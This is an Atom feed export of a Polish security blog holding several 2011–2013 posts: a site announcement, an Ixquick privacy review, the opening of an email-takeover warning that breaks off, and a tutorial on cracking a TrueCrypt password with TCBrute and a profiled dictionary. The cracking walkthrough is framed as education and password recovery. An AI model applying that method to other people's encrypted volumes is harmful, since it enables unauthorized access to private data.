<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-4511012464226103155</id><updated>2024-12-19T04:21:10.006+01:00</updated><category term="Newsy"/><category term="Obrona - Atak"/><category term="Inne"/><category term="Sieci komputerowe"/><category term="Windows"/><category term="Narzędzia"/><category term="Wywiad informatyczny"/><category term="Bezpieczeństwo danych"/><category term="Informacje dnia"/><category term="Bezpieczeństwo systemów operacyjnych"/><category term="Zbieranie informacji"/><category term="Etyczny hacking"/><category term="Linux - Unix"/><category term="Bezpieczeństwo aplikacji"/><category term="Bezpieczeństwo sieci komputerowych"/><category term="Artykuły autorskie"/><category term="Testy penetracyjne"/><category term="Anonimowość"/><category term="Informatyka śledcza"/><category term="HCSL - Newsy"/><category term="Zachowanie anonimowości"/><category term="Kontrola rodzicielska"/><category term="Publikacje"/><category term="Kontrola małżeńska"/><category term="Edukacja"/><category term="Najpopularniejsze"/><category term="Pobieranie"/><title type='text'>HARD CORE SECURITY LAB</title><subtitle type='html'>bccf20dce7e5626afeb7865a2b6cead1</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default?start-index=26&amp;max-results=25&amp;redirect=false'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>634</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-7531842934754154817</id><published>2013-02-02T22:47:00.002+01:00</published><updated>2013-02-02T22:47:54.538+01:00</updated><title type='text'>Sekurak, czyli nowy polski serwis o bezpieczeństwie!</title><content type='html'>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVQ-QeXSjGDY2KGvUy-9yywxVQ55jGJN7CeOBVeYRaycsBRxAiD7soZ64Ky-65CLgiJqQtQ6c1U5sM82p8jhmULAIq7wNn3QNKNwgyM2y3NnghAzNBDWGD7Z7n9PtYk-Fcw1Za3pkuSc0/s1600/logo_male%5B1%5D.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVQ-QeXSjGDY2KGvUy-9yywxVQ55jGJN7CeOBVeYRaycsBRxAiD7soZ64Ky-65CLgiJqQtQ6c1U5sM82p8jhmULAIq7wNn3QNKNwgyM2y3NnghAzNBDWGD7Z7n9PtYk-Fcw1Za3pkuSc0/s1600/logo_male%5B1%5D.jpg&quot; /&gt;&lt;/a&gt;Krótko i na temat... wszystkich, którzy chcieliby znowu czytać moje teksty o bezpieczeństwie IT i nie tylko o tym, zapraszam do nowego &lt;a href=&quot;http://sekurak.pl/&quot;&gt;serwisu&lt;/a&gt;!</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/7531842934754154817/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2013/02/sekurak-czyli-nowy-polski-serwis-o.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/7531842934754154817'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/7531842934754154817'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2013/02/sekurak-czyli-nowy-polski-serwis-o.html' title='Sekurak, czyli nowy polski serwis o bezpieczeństwie!'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVQ-QeXSjGDY2KGvUy-9yywxVQ55jGJN7CeOBVeYRaycsBRxAiD7soZ64Ky-65CLgiJqQtQ6c1U5sM82p8jhmULAIq7wNn3QNKNwgyM2y3NnghAzNBDWGD7Z7n9PtYk-Fcw1Za3pkuSc0/s72-c/logo_male%5B1%5D.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-4234873500299644678</id><published>2011-02-13T18:28:00.003+01:00</published><updated>2011-02-13T18:30:25.559+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo danych"/><category scheme="http://www.blogger.com/atom/ns#" term="Narzędzia"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><title type='text'>Jak odzyskać (złamać) hasło do woluminu TrueCrypta?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/02/jak-odzyskac-haso-do-woluminu.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_yTEzAE2frhps5EF6nQj58CFd5_hcB2TuGUDPcqCmmHmsACI-3BNH3BJiepupRUxoHGdS8Iw8BwnQdjN0GMJbO6bHouuHhgE3irOda8PH6UadnmifnHvhbwz2aITtIgdpq1yeFJ6G5vE/s1600/TCbrute.png&quot; /&gt;&lt;/a&gt;Szyfrowanie naszych danych z wykorzystaniem programów takich jak popularny TrueCrypt, może stanowić dla naszych sekretów bardzo skuteczną ochronę. Zastosowanie silnego szyfrowania wraz z odpowiednio silnym hasłem, może być &lt;a href=&quot;http://www.hcsl.pl/2010/10/kolejny-przypadek-uwiezienia-osoby-za.html&quot;&gt;nie lada wyzwanie dla organów ścigania&lt;/a&gt; poszukujących cyfrowych dowodów. Oczywiści w razie zapomnienia hasła, TrueCrypt powstrzyma przed dostępem do danych również uprawnionego właściciela informacji. Jak się jednak okazuje, odzyskanie (złamanie) hasła broniącego dostępu do zaszyfrowanego woluminu czasem jest jednak jak najbardziej wykonalne, a potrzebne do tego narzędzia są ogólnie dostępne. Spójrzmy na mały praktyczny przykład.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Załóżmy, że chcielibyśmy odzyskać (złamać) hasło broniące dostępu do pewnego testowego woluminu (TC_test) utworzonego za pomocą domyślnych ustawień TrueCrypta. Hasło dostępowe stanowi następująca względnie silna fraza:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;45m0d3u52@!&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
W celu przeprowadzenia naszego eksperymentu skorzystamy z mało znanego &lt;a href=&quot;http://securityvision.ch/index.php?option=com_content&amp;amp;view=article&amp;amp;id=51&amp;amp;Itemid=58&quot;&gt;programu TCBrute 2.5&lt;/a&gt;, który to znajduje się nadal w bardzo wczesnej fazie rozwojowej, jednak już pozwala na wykonania powyższego przykładowego zadania. TCbrute wbrew swej nazwie nie pozwala na przeprowadzania automatycznych ataków siłowych, a jedynie wspiera ataki słownikowe. Musimy więc przygotować sobie słownik potencjalnych haseł.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Dla uproszczenia, słownik wygenerowałem za pomocą programu &lt;a href=&quot;http://www.hcsl.pl/2010/10/oto-program-ktory-jest-w-stanie.html&quot;&gt;Common User Passwords Profiler&lt;/a&gt;, z zachowaniem tych samych zasad co we wpisie &lt;i&gt;&lt;a href=&quot;http://www.hcsl.pl/2010/10/oto-program-ktory-jest-w-stanie.html&quot;&gt;Oto program, który jest w stanie odgadnąć twoje hasła!&lt;/a&gt;&lt;/i&gt; Założyłem więc, że dysponujemy pewną wiedzą o właścicielu hasła i na tej podstawie z pomocą programu CUPP powstał słownik zawierający 23892 hasła (słownik można pobrać &lt;a href=&quot;https://sites.google.com/site/hcseclab/inne/slownik.txt&quot;&gt;tutaj&lt;/a&gt;). Teraz pozostaje nam już tylko skonfigurować TCBrute&#39;a (wskazujemy plik z woluminem oraz słownik z hasłami):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJmZGEfBdE0v1F8mlBETsADw7dGIxWUKrEDUVt3Y-IMbs761W1KtUhyphenhyphen57HdPRSuD1AxLidWCbJc97eb-zFppW5DPSvALMSulM36PmQHFJAjLalCw6w00P3ualAsjti8Iv-gYTgISrs59M/s1600/TCbrute01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;267&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJmZGEfBdE0v1F8mlBETsADw7dGIxWUKrEDUVt3Y-IMbs761W1KtUhyphenhyphen57HdPRSuD1AxLidWCbJc97eb-zFppW5DPSvALMSulM36PmQHFJAjLalCw6w00P3ualAsjti8Iv-gYTgISrs59M/s400/TCbrute01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Już po kilku minutach właściwe hasło zostało odnalezione:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoZne8RFkkzv9zjq1nDafR4EJxbc8l4Ua1LzJXp5zQKM0aiIW6dgvDlm18rTiUT4Zr4UDxRrzdKrC-njJmucQyICq1JYmO3TtG2G9SEAPQPsB4FmtMfP1jgRM_HCaJfFWyfF1J1EliShM/s1600/TCbrute02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;266&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoZne8RFkkzv9zjq1nDafR4EJxbc8l4Ua1LzJXp5zQKM0aiIW6dgvDlm18rTiUT4Zr4UDxRrzdKrC-njJmucQyICq1JYmO3TtG2G9SEAPQPsB4FmtMfP1jgRM_HCaJfFWyfF1J1EliShM/s400/TCbrute02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Prędkość TCBrute&#39;a nie zachwyca. Udało mi się osiągnąć góra kilkadziesiąt prób na sekundę. W praktyce wyklucza to więc poważne ataki polegające na sprawdzaniu wszystkich możliwych kombinacji dłuższych haseł. Z drugiej jednak strony, taka prędkość spokojnie pozwala na sprawdzenie słownika zawierającego kilkadziesiąt lub nawet kilkaset tysięcy haseł w całkiem rozsądnym czasie. W obecnej wersji program jest już w stanie rozłożyć obliczenia na wiele w pełni niezależnych wątków, dzięki czemu wielordzeniowe procesory/systemy powinny nam pozwolić na spore przyspieszenie całego procesu.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Jaki z tego wszystkiego płynie wniosek? TCbrute i podobne rozwiązania nie mogą oczywiście zagrozić bardzo silnym i z niczym nie kojarzącym się hasłom. Jeśli jednak nasze hasło stanowi fraza znane ze &lt;a href=&quot;http://www.hcsl.pl/2010/06/jakie-hasa-najczesciej-stosuja-polscy.html&quot;&gt;słowników haseł typowych&lt;/a&gt;, jest podobne do innych naszych haseł wykorzystywanych w różnych systemach informatycznych lub też &lt;a href=&quot;http://www.hcsl.pl/2009/09/jak-zamac-hasa-danej-osoby-na-podstawie.html&quot;&gt;kojarzy się z jakimiś informacjami ogólnie dostępnymi na nasze temat&lt;/a&gt;, to TCbrute z pewnością może posłużyć intruzowi do przeprowadzenia całkiem skutecznego ataku. Pamiętajmy również zawsze, że typowe ataki słownikowe to nie jedyne metody odzyskiwania haseł do zaszyfrowanych danych. Inne &lt;a href=&quot;http://www.hcsl.pl/2010/04/w-jaki-sposob-suzby-moga-uzyskac-dostep.html&quot;&gt;całkiem proste ataki&lt;/a&gt; mogą się okazać zabójczo skuteczne.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Oczywiście TCbrute może się również okazać przydatny osobom, które zapomniały hasła do własnego woluminu. Na podstawie dostępnych wspomnień hasła oraz znajomości własnych nawyków związanych z tworzeniem haseł, będziemy mogli w takim przypadku przygotować sobie słownik, który przy odrobinie szczęścia pozwoli nam na odzyskanie utraconego dostępu do własnych danych. W jednym i drugim przypadku warto jednak przede wszystkim zdawać sobie sprawę, że narzędzia pozwalające na słownikowe ataki na TrueCrypta istnieją i są ogólnie dostępne.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/4234873500299644678/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/02/jak-odzyskac-haso-do-woluminu.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/4234873500299644678'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/4234873500299644678'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/02/jak-odzyskac-haso-do-woluminu.html' title='Jak odzyskać (złamać) hasło do woluminu TrueCrypta?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_yTEzAE2frhps5EF6nQj58CFd5_hcB2TuGUDPcqCmmHmsACI-3BNH3BJiepupRUxoHGdS8Iw8BwnQdjN0GMJbO6bHouuHhgE3irOda8PH6UadnmifnHvhbwz2aITtIgdpq1yeFJ6G5vE/s72-c/TCbrute.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-4957130581278659223</id><published>2011-02-12T18:18:00.001+01:00</published><updated>2011-02-12T18:18:54.847+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo danych"/><category scheme="http://www.blogger.com/atom/ns#" term="Narzędzia"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><category scheme="http://www.blogger.com/atom/ns#" term="Wywiad informatyczny"/><category scheme="http://www.blogger.com/atom/ns#" term="Zachowanie anonimowości"/><category scheme="http://www.blogger.com/atom/ns#" term="Zbieranie informacji"/><title type='text'>Ixquick, czyli anonimowa i bezpieczna wyszukiwarka?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/02/ixquick-czyli-anonimowa-i-bezpieczna.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLOnolEWOECwDZTDKsrwblXuOyAuJY3oQjhHyV3AfxyrnmMHNhmkwz9UVaW8rWSCt5_UWQs_aOGCSyOCpRLHM8oAj7OHA2jmxP2iUeONXnOYRNP-tYEDWGkF-o4A1o2UFPK_UK-1BgVAI/s1600/ixquick.png&quot; /&gt;&lt;/a&gt;Czy zastanawiacie się czasem nad tym, jak wiele naszych sekretów można by poznać na podstawie samej tylko analizy naszych zapytań kierowanych do internetowych wyszukiwarek? Czy Google gromadzi naszą historię wyszukiwania? &lt;a href=&quot;http://www.hcsl.pl/2010/04/co-wie-o-nas-google.html&quot;&gt;Oczywiście tak&lt;/a&gt;. Co więc zrobić, by w trakcie wyszukiwania mimowolnie nie zdradzać wszystkich swoich tajemnic? Można przykładowo skorzystać z pewnej anonimowej wyszukiwarki, która w dodatku może zwiększyć nasze bezpieczeństwo podczas odwiedzania poszczególnych zwracanych wyników...&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Wyszukiwanie informacji dostępnych w rozmaitych zakamarkach Internetu nieodzownie kojarzy nam się z &lt;i&gt;jedyną słuszną wyszukiwarką&lt;/i&gt; firmy Google. Niestety, popularne wyszukiwarki gromadzą całą historię wyszukiwania. Jeśli przykładowo korzystacie z Google Search będąc zalogowanym na swoje konto Google, sami możecie podejrzeć to, co na temat waszych poszukiwań wie internetowy gigant. Wystarczy tylko odwiedzić usługę &lt;a href=&quot;http://www.google.com/history/?hl=pl&quot;&gt;Google Historia Online&lt;/a&gt;. Jeśli nawet nie korzystamy z wyszukiwarek jako zalogowani użytkownicy, to nasze poszukiwania i tak zostaną zapamiętane i skojarzone z naszym publicznym adresem IP...&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Oczywiście możemy bronić swej prywatności za pomocą rozmaitych rozwiązań anonimizujących korzystanie z Google Search, takich jak chociażby &lt;a href=&quot;http://www.hcsl.pl/2010/01/googlesharing-uchroni-nas-przed.html&quot;&gt;projekt GoogleSharing&lt;/a&gt;. Możemy jednak również skorzystać z innej wyszukiwarki, która obiecuje nam nie tylko całkowitą anonimowość, ale również więcej trafnych wyników. Poza tym, jej specyfika sprawia, że w pewnym sensie będziemy również chronieni przed nieuczciwymi kampaniami reklamowymi, czy też zagrożeniami takimi jak &lt;a href=&quot;http://www.hcsl.pl/2010/04/w-jaki-sposob-crackerzy-manipuluja.html&quot;&gt;Blackhat Search Engine Optimization&lt;/a&gt;. Spójrzmy więc pokrótce na interesujące możliwości mało znanej w Polsce wyszukiwarki &lt;a href=&quot;http://www.ixquick.com/&quot;&gt;Ixquick&lt;/a&gt;.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7k-ckROp5M-YXV8wdLfhace6vYbALE_pZKJ95fX0zYSkVMxxLsAgvruyxrH6FsgWcXwtKpAGMY6-C-y8rA5vaaJCCFF6ThzaojMYgDEeJJHsKjyMl1sj-9PJcl9hP8EG9Fs4yOTUfJ4o/s1600/ixquick01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;280&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7k-ckROp5M-YXV8wdLfhace6vYbALE_pZKJ95fX0zYSkVMxxLsAgvruyxrH6FsgWcXwtKpAGMY6-C-y8rA5vaaJCCFF6ThzaojMYgDEeJJHsKjyMl1sj-9PJcl9hP8EG9Fs4yOTUfJ4o/s400/ixquick01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Najprawdziwsze anonimowe wyszukiwanie?&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Ixquick jest metawyszukiwarką, czyli zwracane przez nią wyniki powstają w oparciu o wyniki pochodzące z innych popularnych wyszukiwarek. Zapytania są realizowane jednocześnie z wykorzystaniem zewnętrznych silników, a odpowiedni algorytm tworzy dla nas jednolitą listę wyników. Wyniki mogą być dokładniejsze w porównaniu do jakiejkolwiek innej zwykłej wyszukiwarki, dzięki interesującemu algorytmowi oceny tej samej witryny z punktu widzenia różnych wyszukiwarek.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Ixquick przyznaje stronie jedną gwiazdkę za każdą wyszukiwarkę, która umieściła ją w pierwszej dziesiątce swoich wyników. Pięć gwiazdek oznacza więc, że pięć różnych wyszukiwarek wysoko oceniło daną stronę. Taki wynik możemy więc uznać za bardzo wiarygodny. Jak wiemy, niektóre niepożądane strony internetowe mogą być &lt;a href=&quot;http://www.hcsl.pl/2010/04/w-jaki-sposob-crackerzy-manipuluja.html&quot;&gt;zoptymalizowane tak&lt;/a&gt;, aby mogły oszukać algorytm wyszukiwania jednej z wyszukiwarek, ale jest to znacznie trudniejsze w przypadku, gdy wyszukiwarek jest kilka. W taki właśnie sposób Ixquick może nam więc pomóc w ochronie przed odwiedzeniem witryn wypromowanych za pomocą wspomnianego już&amp;nbsp;&lt;a href=&quot;http://www.hcsl.pl/2010/04/w-jaki-sposob-crackerzy-manipuluja.html&quot;&gt;Blackhat SEO&lt;/a&gt;.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Inną interesującą i bardzo unikalną cechą tej wyszukiwarki jest natomiast całkowita ochrona naszej prywatności. Oczywiście korzystając z Ixquick bezpośrednio nie odpytujemy żadnej innej wyszukiwarki (robi to za nas sam Ixquick), dzięki czemu żaden inny dostawca tego typu usług nie pozna naszych zainteresowań i sekretów. Poza tym, od stycznia 2009 roku sam &lt;a href=&quot;https://us2.ixquick.com/pol/protect-privacy.html&quot;&gt;Ixquick nie rejestruje już żadnych informacji na temat swych użytkowników&lt;/a&gt; (brak rejestracji adresów IP użytkowników oraz brak korzystania z plików cookie umożliwiających identyfikację użytkowników), dzięki czemu korzystając z jego usług otrzymujemy coś na kształt prawdziwego anonimowego wyszukiwania.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Mimo niewielkiej popularności tego typu metawyszukiwarek w Polsce, myślę że powyższe interesujące cechy Ixquick sprawiają, że warto się zainteresować tym przedsięwzięciem. Oczywiście sami nie upewnimy się co do tego, czy firma ta rzeczywiście nie rejestruje żadnych informacji na temat swych użytkowników. Mają o tym jednak świadczyć rozmaite certyfikaty, takie jak &lt;a href=&quot;https://www.european-privacy-seal.eu/press-room/press-releases/20080714-europrise-press-release-en.html&quot;&gt;Europejski Certyfikat Prywatności&lt;/a&gt;. Ciekaw jestem, co myślicie na temat tych wszystkich zapewnień ze strony firmy Ixquick i czy bylibyście w stanie porzucić swoją ulubioną wyszukiwarkę na rzecz metawyszukiwarki oferującej anonimowe wyszukiwanie?&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/4957130581278659223/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/02/ixquick-czyli-anonimowa-i-bezpieczna.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/4957130581278659223'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/4957130581278659223'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/02/ixquick-czyli-anonimowa-i-bezpieczna.html' title='Ixquick, czyli anonimowa i bezpieczna wyszukiwarka?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLOnolEWOECwDZTDKsrwblXuOyAuJY3oQjhHyV3AfxyrnmMHNhmkwz9UVaW8rWSCt5_UWQs_aOGCSyOCpRLHM8oAj7OHA2jmxP2iUeONXnOYRNP-tYEDWGkF-o4A1o2UFPK_UK-1BgVAI/s72-c/ixquick.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-5556619617930345981</id><published>2011-02-05T19:18:00.003+01:00</published><updated>2011-02-05T19:35:45.334+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo aplikacji"/><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo danych"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><title type='text'>Kolejny sposób na przejęcie tysięcy kont poczty e-mail?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/02/kolejny-sposob-na-przejecie-tysiecy.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCCE7cHEYZa__B_hyphenhyphen3PfKfkyDhc883Q3fPgk5sg-oVoW1ZgrZKaF21a_F5r4ZBb0uzqZXgs6OzNv5m2KmpIKtDjELtJzKZ7EESb76hDHJdpOdouBdIbkMwp2a08wTzraMdJZAcDj_0ws4/s1600/Hotmail.png&quot; /&gt;&lt;/a&gt;Internetowi intruzi znają całą masę skutecznych sposobów na przejmowanie kontroli nad cudzymi kontami poczty elektronicznej. Mogą to być przykładowo ataki &lt;a href=&quot;http://www.hcsl.pl/2010/05/uwaga-na-nowy-rodzaj-atakow.html&quot;&gt;phishingowe&lt;/a&gt;, zgadywanie &lt;a href=&quot;http://www.hcsl.pl/2010/03/tak-robia-to-komputerowi-przestepcy-iii.html&quot;&gt;odpowiedzi na pytania pomocnicze&lt;/a&gt;, podsłuchiwanie haseł &lt;a href=&quot;http://www.hcsl.pl/2010/02/wirtualna-polska-zamknea-luke-w.html&quot;&gt;transmitowanych w postaci nieszyfrowanej&lt;/a&gt; oraz rozmaite inne &lt;a href=&quot;http://www.hcsl.pl/2010/06/jak-nie-hackowac-google-gmaila.html&quot;&gt;proste podstępy&lt;/a&gt;. Wszystkie te metody wymagają jednak albo jakiejś interakcji z samym użytkownikiem usługi, albo też bazują na tym, że nie zachował on elementarnych zasad bezpieczeństwa. Dziś natomiast chciałbym ostrzec wszystkich czytelników HCSL przed inną, stosunkowo mało znaną i do tego całkiem skuteczną metodą przejmowania kontroli nad cudzymi kontami poczty elektronicznej.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
